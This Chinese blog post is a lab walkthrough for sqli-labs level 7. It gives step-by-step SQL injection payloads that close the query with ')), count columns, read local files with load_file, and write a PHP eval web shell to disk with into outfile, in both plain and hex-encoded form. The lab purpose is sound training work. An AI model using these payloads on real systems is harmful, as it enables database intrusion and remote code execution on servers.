sqli-labs靶场7关(知道根目录的注入)

最新推荐文章于 2024-06-05 08:30:00 发布
最新推荐文章于 2024-06-05 08:30:00 发布
阅读量807 收藏
点赞数
分类专栏: sqli-labs靶场 文章标签: mysql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46527080/article/details/111086822
版权

知识点

首先要掌握一下相关的函数和知识点
函数:

load_file()函数    是MySQL读取本地文件的函数(读取)
into outfile()函数  是用来导出文件的(写入)
@@basedir函数  查询当前路径
@@datadir函数  查询数据库安装路径

1.load_file()函数用法
在这里插入图片描述2.into outfile()函数用法
在这里插入图片描述查看一下
在这里插入图片描述3.查询当前路径:

select @@basedir;

在这里插入图片描述4.查询当前MySQL路径:

select @@datadir;

在这里插入图片描述5.解决写入权限问题
在E:\Phpmysql\PHPTutorial\MySQL(mysql根目录中)
打开my.ini
添加一条
secure_file_priv=“D:” //就是将写入的文件放在D盘下面
在这里插入图片描述保存退出
然后重启一下phpstudy

第七关开始

查看源码
在这里插入图片描述发现$id传参的值是被((‘包裹’))
所以闭合字符为((‘’))
但是我们还是要从浏览器上开始

一、判断注入点
判断闭合字符 注释后边的语句

?id=1')) and 1=1 --+ (回显正常)
?id=1')) and 1=2 --+ (回显错误)

在这里插入图片描述证明此关的注入点是’))
查看回显信息就能看出是写入文件的一个注入
二、判断列数

?id=1')) order by 3 --+

在这里插入图片描述三、联合查询

?id=1')) union select 1,2,3 --+

在这里插入图片描述四、进行读取的执行

?id=1')) union select 1,2,load_file("D:\2.txt") into outfile 'D:/3.php' --+

读取D盘中的2.txt内容,并将内容写入到D盘下面的3.php

?id=1')) union select 1,2,load_file("D:/2.txt") into outfile 'D:/4.php'--+

这条语句要证明/和\在这个语句中没有影响,也不需要转义
在这里插入图片描述在这里插入图片描述在这里插入图片描述五、进行文件写入

?id=1')) union select 1,2,'<?php eval($_POST[cmd]);>' into outfile "d:\ma.php" --+

注意:上传一句话木马一定要转成16进制

union select null,0x3c3f706870206576616c28245f504f53545b2774657374275d293f3e,null into outfile “D://phpstudy//www//sqli”

在这里插入图片描述在这里插入图片描述在这里插入图片描述

24team
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs卡7(结合文件上传漏洞+一句马+菜刀)通思路
zyh1588的博客
10-28 1106
小白对sqli-labs第七的理解
详细sqli-labs(1-20)通讲解
m0_57928318的博客
05-18 1520
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
基于Sqli-Labs靶场的SQL注入-第6~10
Joker
11-25 1965
本文讲解 updatexml() 函数报错注入、导出文件字符型注入、布尔盲注、时间盲注、中国蚁剑简单使用、一句话木马注入
sqli-labs靶场搭建
joey_1123的博客
05-21 1018
4.打开D:\phpstudy_pro\WWW\sqli-labs\sql-connections中的db-creds.inc 修改如图。3.把这个解压到php根目录下 修改名字为sqli-labs。9.退回再点第一个SQLi-LABS Page…7.用浏览器访问127.0.0.1/sqli-labs。5.修改phpstudy中数据库的密码为123456。2.去github上下载sqli-labs。8.点击第二个选项Setup/reset…注:不能使用 php7.x 版本。sqli-labs靶场搭建。
Windows搭建sqli-labs靶场
JJH2724719395的博客
11-19 765
Windows搭建sqli-labs靶场
sqli-labs 第七 多命通攻略
两个月亮
01-05 1655
错误输入与不正常输入的返回结果是相同的。该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。怎么会这样?等等,我们刚刚得出的结论好像被忽略了:该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。既然返回结果为空都将返回,那我们刚刚构造的判断语句又怎么能够判断出注入类型呢?在遇到读写权限问题后,尝试向搜索引擎寻求帮助,但解决方案大多针对 Linux 操作系统且并不详细,只好自己摸索了。
Sqli-labs-maste靶场的下载、配置
最新发布
weixin_68416970的博客
06-05 593
Sqli-labs-master靶场的下载、配置教程
sqli-labs 靶场搭建
weixin_56306210的博客
07-26 1167
sqli-labs 靶场搭建
sqli-labs靶场1-5
2302_80044238的博客
01-27 1952
输入:(解析:updatexml()是一个用于修改XML数据的SQL函数 1 是XML中的路径,concat()用于将0x7e和selectdatabase()函数拼接起来,0x7e是十六进制表示~特殊符号会导致查询出错从而爆出数据 (0x7e也可使用其他符号代替但是需要加上单引号))当我们尝试不闭合还有单引号闭合两种方法时发现页面反馈给我们的时sql语法不正确也就是我们所注入的sql攻击语句是无法执行的,此时我们可以去看看此网页的源代码(可以直接在小皮的根目录里面找对应的卡就可以找到)
phpstudy 搭建 sqli-labs SQL 注入靶场
两个月亮
12-25 1081
在过去,如果文件的名称仅大小写不同,则 Windows 将无法访问这些文件,因为 Windows 应用程序将文件系统视为不区分大小写,并且无法区分名称仅大小写不同的文件。所以刚刚的 Warning 是在提醒我们,GitHub 中的目标项目中的某个文件夹中出现了有大小写之分的同名文件。Windows 的文件系统默认是对文件夹大小写不敏感的,也就是说 Class 文件夹与 class 会被认为是同一个文件夹,不单单是文件夹,对文件也是这样的。,使用 cd 命令切换到将用来安装项目文件的目录下。
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs靶场8(布尔盲注)
qq_46527080的博客
12-12 2248
知识点 函数 ascii()函数 将某个字符串转化为ascii值(webRobot转换工具) ord()函数 将某个字符串转化为ascii值 length()函数 返回字段/结果/函数的长度,length(column_name) length(database()) 即返回当前数据库名长度 substr()函数 截取字符段长度 例如:substr(abcd,1,1) 从第一位开始(也就是从a开始)截取一个字符,就是a substr(abcd,2
sqli-labs 第25(过滤or和AND )
qq_46527080的博客
12-25 1632
25 源码分析 发现闭合点是的单引号 将or和AND替换成了空格 然后我们就来思路了,我们可以使用联合查询还有报错查询 一、判断注入点 二、判断列数 发现很直观的把我们的or给过滤掉了 我们试试双写 三、构造payload ?id=-1' union select 1,2,3--+ 1.爆库、 ?id=-1' union select 1,group_concat(schema_name),3 from infoorrmation_schema.schemata --+ 由于information
sqli-labs靶场9-10(时间盲注)
qq_46527080的博客
12-12 1134
知识点 函数 if()函数 条件判断函数 if(a,b,c) if判断句,a为条件,b、c为执行语句;如果a为真就执行b,a为假就执行c; sleep()函数 网页延迟n秒后,输出结果 left()函数 从左边数,取几个数 例如:left(abcdef,3) 取3位左边的数,就是abc 第九 源码分析: 开搞 一、判断注入点(需要用到sleep函数) ?id=1')and (sleep(4)) --+ (耗时2s,这是正常的页面,没有闭合的页面) ?id=1'an
ubuntu搭建sqli-labs靶场
10-15
好的,以下是搭建sqli-labs靶场的步骤: ... ``` sudo apt-get update ... ``` 2. 下载sqli-labs代码: ``` git clone ...7. 访问sqli-labs靶场: 在浏览器中输入:http://localhost/sqli-labs/
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值